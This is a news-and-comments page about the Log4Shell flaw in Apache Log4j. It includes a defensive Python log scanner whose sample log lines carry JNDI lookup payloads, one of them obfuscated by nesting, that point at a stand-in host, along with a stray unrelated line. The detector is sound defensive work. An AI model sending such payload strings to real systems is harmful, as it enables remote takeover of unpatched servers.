The problem lies in Log4j, a ubiquitous, open source Apache logging framework that developers use to keep a record of activity within an application. Security responders are scrambling to patch the bug, which can be easily exploited to take control of vulnerable systems remotely. At the same time, hackers are actively scanning the internet for affected systems. Some have already developed tools that automatically attempt to exploit the bug, as well as worms that can spread independently from one vulnerable system to another under the right conditions.
Log4j is a Java library, and while the programming language is less popular with consumers these days, it's still in very broad use in enterprise systems and web apps. Researchers told WIRED on Friday that they expect many mainstream services will be affected.
For example, Microsoft-owned Minecraft on Friday posted detailed instructions for how players of the game's Java version should patch their systems. "This exploit affects many services—including Minecraft Java Edition," the post reads. "This vulnerability poses a potential risk of your computer being compromised." Cloudflare CEO Matthew Prince tweeted Friday that the issue was "so bad" that the internet infrastructure company would try to roll out at least some protection even for customers on its free tier of service.
All an attacker has to do to exploit the flaw is strategically send a malicious code string that eventually gets logged by Log4j version 2.0 or higher. The exploit lets an attacker load arbitrary Java code on a server, allowing them to take control.
"It's a design failure of catastrophic proportions," says Free Wortley, CEO of the open source data security platform LunaSec. Researchers at the company published a warning and initial assessment of the Log4j vulnerability on Thursday.
'The internet's on fire': Techs race to fix major cybersecurity software flaw:
Amit Yoran, CEO of the cybersecurity firm Tenable, called it "the single biggest, most critical vulnerability of the last decade" — and possibly the biggest in the history of modern computing.
The vulnerability, dubbed 'Log4Shell,' was rated 10 on a scale of one to 10 by the Apache Software Foundation, which oversees development of the software. Anyone with the exploit can obtain full access to an unpatched computer that uses the software. Experts said the extreme ease with which the vulnerability lets an attacker access a web server — no password required — is what makes it so dangerous.
New Zealand's computer emergency response team was among the first to report that the flaw was being "actively exploited in the wild" just hours after it was publicly reported Thursday and a patch released.
The vulnerability, located in open-source Apache software used to run websites and other web services, was reported to the foundation on November 24 by the Chinese tech giant Alibaba, it said. It took two weeks to develop and release a fix. But patching systems around the world could be a complicated task.
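As an added example (not code from the WIRED or AP coverage quoted above), here is a small defender-side log scanner in Python for the "malicious string that eventually gets logged" problem: it flags entries whose attacker-controlled fields carry a Log4j lookup expression with a jndi prefix, and also flags nested lookups, because a plain substring match for the literal jndi prefix misses those. The log lines, hostnames and field layout are constructed for the example.

```python
import re
from dataclasses import dataclass

# Constructed sample access-log lines (not from the page). The User-Agent field
# is attacker-controlled and is a typical place for a logged lookup string.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:14:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:14:02:13 +0000] "GET /login HTTP/1.1" 200 1024 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.7 - - [10/Dec/2021:14:02:15 +0000] "GET /api HTTP/1.1" 200 88 "-" "${${lower:j}ndi:rmi://example.invalid/b}"',
    '10.0.0.3 - - [10/Dec/2021:14:02:19 +0000] "GET /docs HTTP/1.1" 200 2048 "-" "curl/7.79.1 ${date:yyyy}"',
]

# Matches only innermost ${...} lookups (no braces inside), so the prefix can be read off.
LOOKUP_RE = re.compile(r"\$\{([^{}]*)\}")


@dataclass
class Finding:
    line_no: int
    reason: str
    snippet: str


def lookup_depth(text: str) -> int:
    """Deepest nesting of ${...} lookups in text; 0 if there are none."""
    depth = max_depth = i = 0
    while i < len(text):
        if text.startswith("${", i):
            depth += 1
            max_depth = max(max_depth, depth)
            i += 2
            continue
        if text[i] == "}" and depth:
            depth -= 1
        i += 1
    return max_depth


def classify(text: str):
    """Return a reason string if text contains a suspicious Log4j lookup, else None."""
    if "${" not in text:
        return None
    prefixes = {m.split(":", 1)[0].strip().lower() for m in LOOKUP_RE.findall(text)}
    if "jndi" in prefixes:
        return "jndi lookup"
    if lookup_depth(text) > 1:  # nesting is how a plain ${jndi: match gets evaded
        return "nested lookup (possible obfuscated jndi)"
    return None


def scan_log(lines):
    """Return one Finding per log line that classify() considers suspicious."""
    return [Finding(n, r, line[:80]) for n, line in enumerate(lines, 1) if (r := classify(line))]
```

Run on the constructed lines it reports lines 2 and 3; the date lookup on line 4 is left unflagged, which is a tuning decision a deployment should revisit.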
May I have a cup of water?
(Score: 1, Funny) by Anonymous Coward on Saturday December 11 2021, @03:03PM (6 children)
Yeah maybe the NSA funded this.
Often even that coder in Nebraska wouldn't add or approve such moronic "features", much less enable them by default.
(Score: 2, Insightful) by Anonymous Coward on Saturday December 11 2021, @03:58PM (5 children)
At some point, sane people say "enough already - fix your existing shit."
(Score: 5, Insightful) by VLM on Saturday December 11 2021, @06:13PM (3 children)
The fundamental problem with Java enterprise bloatware is nobody never had the balls to say no to anything. So you get string interpolated, URL look up logging libraries returning executable functions instead of logging stuff like cruder more simplistic non-enterprise grade software.
Civilized secure languages tell the programmer to STFU and print to a console or write to a file or shove lines of text in what amounts to one UDP packet to port 514 on some server far away and be happy because when I was a kid I debugged by walking uphill both ways in the snow and sure it took me three days of debugging to get some obscure PIC microcontroller to blink a LED instead of crashing on boot, but fuck those enterprise developers my blinking LED never got powned by those wiley Russian Hackers still trying to steal the 2016 election despite it being 2021.9998.
Minecraft never wouldda gotten powned if it was written in a civilized language like TCL/TK but no they had to Java it all up till they inevitably got powned.
(Score: 3, Touché) by fishybell on Sunday December 12 2021, @12:21AM
Ah yes, Tcl, where all executable functions are just strings, and all strings are executable. Definitely a civilized language.
(Score: 0) by Anonymous Coward on Monday December 13 2021, @01:53PM (1 child)
Java before 1.4 was kind of like the Go language in that it had an intentionally extremely limited set of features. That made the code simple and readable, but it also meant that there were a bazillion libraries for common features and the world started using XML to represent data structures because it was less verbose ( 😱 ) than Java.
Now Java has regular expressions, generics, annotations (arguably a limited form of multiple inheritance), interfaces with default function implementations (arguably another limited form of multiple inheritance), lambdas, multi line strings, and limited variable type inference. Any program you could write in 100k lines of Java 1.3 could probably be written in less than 20k lines of Java 17. And Java 17 is still bloated compared to Python, Kotlin, Scala, Lisp, and a number of other expressive languages.
(Score: 0) by Anonymous Coward on Wednesday December 15 2021, @10:21AM
Go just got generics, actually.
(Score: 0) by Anonymous Coward on Tuesday December 14 2021, @02:34AM
Funny you say that, but in recent years they've removed CORBA, Web Start & applets and a bunch of other things including XML processing, etc. and try to focus it down to key capabilities and shed legacy stuff. Maybe you're still stuck in the 90s version of Java where it kept adding stuff.
The past rarely stays where it is - people commenting based on their experience at a point in time in the past really need to rethink how they communicate.